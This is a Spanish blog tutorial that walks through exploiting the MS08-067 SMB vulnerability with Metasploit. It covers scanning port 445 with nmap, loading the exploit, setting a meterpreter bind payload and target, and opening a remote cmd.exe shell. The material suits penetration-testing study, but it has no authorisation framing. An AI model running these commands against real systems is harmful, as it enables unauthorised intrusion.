Nerja Technologies

Bueno entramos ya en campos mas especializados, seguiremos utlizando la misma vulnerabilidad la ms08_067_netapi. Pero ahora lo haremos todo de forma mas manual. De todas maneras os explicare algunos comandos para que vayais indagando por vuestra parte con otros exploits, empezamos....

msf > show exploits --------------> Muestra todos los Exploits

msf > show payloads --------------> Muestra todos los Payloads

msf > info nombre_exploit o nombre_payload ---> Muestra toda la información de lo solicitado y de las variables que son necesarias para que funcione.

¿Cómo cargamos el exploit que deseamos utilizar?
Como vamos a utilizar el ms08_067_netapi pues lo utilizaremos como ejemplo.

msf > use windows/smb/ms08_067_netapi ---------- Cargamos el exploit

msf > set PAYLOAD windows/meterpreter/bind_tcp ----- Selecionamos el payload que es el metodo por el que vamos a entrar

msf > nmap -sS -PS445 -p445 -n -T Aggressive 192.168.1.0/24

Miramos la ip que vamos a utilizar, debemos ver que el puerto 445 este en OPEN, hay veces que aparece FILTERED que quiere decir que esta filtrado por un Firewall.

msf > set RHOST 192.168.1.3 ----> El equipo objetivo



msf > exploit


Directamente ya podriamos ejecutar el exploit pero hay veces que da errores porque no reconoce el idioma del sistema operativo, en ese caso deberemos seleccionarlo nosotros manualmente.

msf > show targets ------------ Miramos todos los sistemas operativos

msf > set TARGET 0 ------------ El numero del sistema operativo

Bueno y que es el meterpreter, es un lenguaje intermedio que nos facilita el uso, ya que dentro de la consola de windows habria cosas que serian muy laboriosas de hacer.

meterpreter > help -------------> lista de comandos

Ya solo os queda investigar un poco pero por ejemplo para a la consola de windows

meterpreter > execute -H -i -f cmd.exe


Y ya estamos dentro, ya solo os queda ir investigando por vuestra cuenta. Espero que os haya sido de ayuda.